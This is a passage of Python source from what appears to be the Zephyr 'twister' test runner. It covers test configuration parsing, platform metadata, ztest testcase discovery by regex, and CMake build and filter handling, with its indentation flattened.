"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.timeout_multiplier = 1.0
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.timeout_multiplier = testing.get("timeout_multiplier", 1.0)
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestSuite.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = []):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
self.ztest_suite_names = ztest_suite_names
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
def __init__(self, name=None, testsuite=None):
self.duration = 0
self.name = name
self.status = None
self.reason = None
self.testsuite = testsuite
self.output = ""
def __lt__(self, other):
return self.name < other.name
def __repr__(self):
return "<TestCase %s with %s>" % (self.name, self.status)
def __str__(self):
return self.name
class TestSuite(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testsuite_root, workdir, name):
"""TestSuite constructor.
This gets called by TestPlan as it finds and reads test yaml files.
Multiple TestSuite instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testsuite_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testsuite_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.testcases = []
self.name = self.get_unique(testsuite_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.platform_type = []
self.toolchain_exclude = None
self.toolchain_allow = None
self.ts_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
def add_testcase(self, name):
tc = TestCase(name=name, testsuite=self)
self.testcases.append(tc)
@staticmethod
def get_unique(testsuite_root, workdir, name):
canonical_testsuite_root = os.path.realpath(testsuite_root)
if Path(canonical_zephyr_base) in Path(canonical_testsuite_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testsuite_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testsuite_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
Find regular ztest testcases like "ztest_unit_test" or similar. Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
Get search area boundary based on "ztest_test_suite(...)",
"ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
functions occurrence.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not suite_run_match and not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
def _find_new_ztest_testcases(self, search_area):
"""
Find regular ztest testcases like "ZTEST" or "ZTEST_F". Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
Parse search area and try to find testcases defined in testcase_regex
argument. Return testcase names and eventually found warnings.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
# if testcases are provided as part of the yaml, skip this step.
if not self.testcases:
# only add each testcase once
for sub in set(subcases):
name = "{}.{}".format(self.id, sub)
self.add_testcase(name)
if not subcases:
self.add_testcase(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
Try to find src directory with test source code. Sometimes due to the
optimization reasons it is placed in upper directory.
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestSuite on a platform
@param test The TestSuite object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testsuite, platform, outdir):
self.testsuite = testsuite
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.execution_time = 0
self.name = os.path.join(platform.name, testsuite.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testsuite.name)
self.run = False
self.testcases = []
self.init_cases()
# Fix an issue with copying objects from testsuite, need better solution.
def init_cases(self):
for c in self.testsuite.testcases:
self.add_testcase(c.name)
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
def add_missing_testscases(self, status, reason=None):
for case in self.testcases:
if not case.status:
case.status = status
if reason:
case.reason = reason
else:
case.reason = self.reason
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
def set_case_status_by_name(self, name, status, reason=None):
tc = self.get_case_or_create(name)
tc.status = status
if reason:
tc.reason = reason
return tc
def add_testcase(self, name):
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
def get_case_by_name(self, name):
for c in self.testcases:
if c.name == name:
return c
return None
def get_case_or_create(self, name):
for c in self.testcases:
if c.name == name:
return c
logger.debug(f"Could not find a matching testcase for {name}")
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
@staticmethod
def testsuite_runnable(testsuite, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testsuite.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testsuite.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testsuite.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testsuite.build_only:
return False
# Do not run slow tests:
skip_slow = self.testsuite.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testsuite.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testsuite_runnable = self.testsuite_runnable(self.testsuite, fixtures)
return testsuite_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testsuite.extra_configs:
content = "\n".join(self.testsuite.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testsuite_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testsuite.extra_sections)
def __repr__(self):
return "<TestSuite %s on %s>" % (self.testsuite.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testsuite, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testsuite = testsuite
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
if not self.instance.run:
self.instance.add_missing_testscases("skipped", "Test was built only")
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
overflow_found = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if overflow_found and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(overflow_found[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(overflow_found[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
for tc in self.instance.testcases:
tc.status = self.instance.status
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testsuite, platform, source_dir, build_dir):
super().__init__(testsuite, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testsuite and self.testsuite.ts_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testsuite.ts_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testsuite.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testsuite.name): True}
else:
return {os.path.join(self.platform.name, self.testsuite.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, tplan, instance, **kwargs):
super().__init__(instance.testsuite, instance.platform, instance.testsuite.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.testplan = tplan
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
self.seed = kwargs.get('seed', 0)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testsuite.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
# Here we check the runtime filter results coming from running cmake
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "filtered"
